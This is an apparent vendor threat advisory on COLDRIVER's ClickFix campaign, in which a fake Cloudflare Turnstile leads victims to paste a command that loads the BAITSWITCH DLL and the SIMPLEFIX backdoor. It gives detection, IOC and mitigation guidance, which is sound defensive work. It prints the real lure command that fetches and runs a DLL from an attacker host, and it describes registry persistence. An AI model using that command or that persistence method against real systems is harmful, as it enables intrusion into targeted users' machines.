top of page

ClickFix COLDRIVER’s Fake Turnstile Lure Delivers BAITSWITCH and SIMPLEFIX

October 8th, 2025

High

Our Cyber Threat Intelligence Unit is monitoring an ongoing ClickFix social engineering campaign, which is linked to the Russia-associated APT COLDRIVER (also known as Star Blizzard / Callisto / UNC4057). In September 2025, researchers identified a multi-stage infection process that exploits a fake Cloudflare Turnstile UI to deceive users into pasting a malicious command from their clipboard. Running this command loads a malicious DLL, Machinerie.dll, which Zscaler calls BAITSWITCH. This DLL downloads and runs a PowerShell backdoor named SIMPLEFIX.  Adversaries employ environmental filtering to deliver payloads only to selected targets, focusing on civil society organizations, journalists, think tanks, and advocacy groups, particularly those involved in human rights, and democracy. 

Technical Details

  • Attack Type: Social engineering (ClickFix), remote code execution via rundll32.exe, multi-stage downloader + PowerShell backdoor.

  • Severity: High

  • Delivery Method: Victims visit a lure page mimicking a legitimate resource. The site displays a fake Cloudflare Turnstile, whose JavaScript copies a rundll32.exe \\<UNC>\machinerie.dll,verifyme command to the clipboard and prompts the user to paste it into the Windows Run dialog.

  • Execution Chain:

    • rundll32.exe executes Machinerie.dll (BAITSWITCH) → performs environment and user-agent checks.

    • DLL fetches tasking from captchanom[.]top and related C2 domains, returning 404 for non-matching agents.

    • Receives AES-encoded payload blobs and registry-based persistence commands.

    • BAITSWITCH writes an AES-encrypted PowerShell script to the registry and drops %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1.

    • Configures persistence via UserInitMprLogonScript registry value → PowerShell stager runs on login.

    • PowerShell stager decrypts and launches the SIMPLEFIX backdoor, enabling command execution and C2 communications.

Image by ThisisEngineering

Impact

  • Systems executing the clipboard command receive a downloader that establishes registry-based persistence and installs a PowerShell backdoor.

  • Compromised hosts may allow credential theft, data exfiltration, or serve as footholds for follow-on operations.

  • Use of rundll32.exe + registry-stored payloads reduces disk forensic traces, delaying detection.

  • Campaign relies on selective payload delivery and legitimate hosting (e.g., Google Drive decoys), undermining static URL blocklists.

Detection Method

  • Monitor Run-dialog and clipboard activity: alert on rundll32.exe \\<UNC>\… patterns or pastes from untrusted sites.

  • Detect rundll32.exe loading DLLs from remote UNC paths or exports such as verifyme.

  • Watch for registry changes to HKCU\Environment\UserInitMprLogonScript and creation of %APPDATA%\Microsoft\Windows\*.ps1.

  • Inspect outbound HTTP(S) to known C2s: captchanom[.]top, southprovesolutions[.]com, preentootmist[.]org, blintepeeste[.]org.

  • Enable PowerShell ScriptBlock + AMSI logging to capture in-memory decryption of AES blobs and registry artifacts (EnthusiastMode, QatItems).

Indicators of Compromise

Type 

Indicator 

Description 

UNC path / command 

 

rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme 

 

Clipboard command used by lure; initial execution vector. 

DLL Component 

Machinerie.dll (BAITSWITCH) 

FvFLcsr23.ps1 

Downloader DLL executed via rundll32.exe 

Domain 

captchanom[.]top ,  

southprovesolutions[.]com 

preentootmist[.]org 

blintepeeste[.]org 

Primary C2 domain serving commands and payloads. 

File 

 

 

%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1 

PowerShell stager drop path used for persistence. 

URL 

hxxps://preentootmist[.]org/?uinfo_message=Resilient_Voices 

hxxps://blintepeeste[.]org/?u_storages=Resilient_Voices_concept 

hxxps://captchanom[.]top/check/machinerie.dll 

hxxps://captchanom[.]top/coup/premier 

hxxps://captchanom[.]top/coup/deuxieme 

hxxps://captchanom[.]top/coup/troisieme 

hxxps://captchanom[.]top/coup/quatre 

hxxps://southprovesolutions[.]com/FvFLcsr23 

hxxps://southprovesolutions[.]com/Zxdf 

hxxps://southprovesolutions[.]com/KZouoRc 

hxxps://southprovesolutions[.]com/EPAWl 

hxxps://southprovesolutions[.]com/VUkXugsYgu 

URLs related to clickfix Phishing page, BAITSWITCH DLL host  

HASH 

FvFLcsr23.ps1 — 62ab5a28801d2d7d607e591b7b2a1e9ae0bfc83f9ceda8a998e5e397b58623a0 

Malicious file hash  

Email Account 

 

 

narnobudaeva@gmail[.]com 

Attacker-controlled Google Drive account used to host decoy documents. 

 

mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

  • Block / monitor C2 domains (captchanom[.]top, southprovesolutions[.]com, etc.) at firewall and DNS layers.

  • Hunt for rundll32 \\UNC command patterns in endpoint telemetry; quarantine affected hosts.

  • Enable PowerShell ScriptBlock, Module, and AMSI logging; centralize for correlation.

  • Monitor registry writes to UserInitMprLogonScript and new PowerShell scripts in %APPDATA%.

  • Educate users about ClickFix threats and reinforce that no legitimate site will request pasting clipboard commands into Run dialogs.

  • If BAITSWITCH / SIMPLEFIX activity is found, isolate the host, collect memory + registry evidence, then remove persistence after forensic capture and rotate credentials.

Conclusion

The COLDRIVER ClickFix campaign demonstrates how simple GUI tricks can still yield high-confidence execution in targeted environments. By abusing the clipboard → Run workflow and legitimate Windows binaries, threat actors bypass traditional email filters and leave minimal disk artifacts. We urge organizations to combine user education with technical controls, such as clipboard/run-dialog monitoring, PowerShell logging, strict UNC execution policies, and network blocking of the listed C2 domains to maintain a proactive security posture. Additionally, we recommend actively threat-hunting for the registry and file artifacts mentioned in the Indicators of Compromise section above.

bottom of page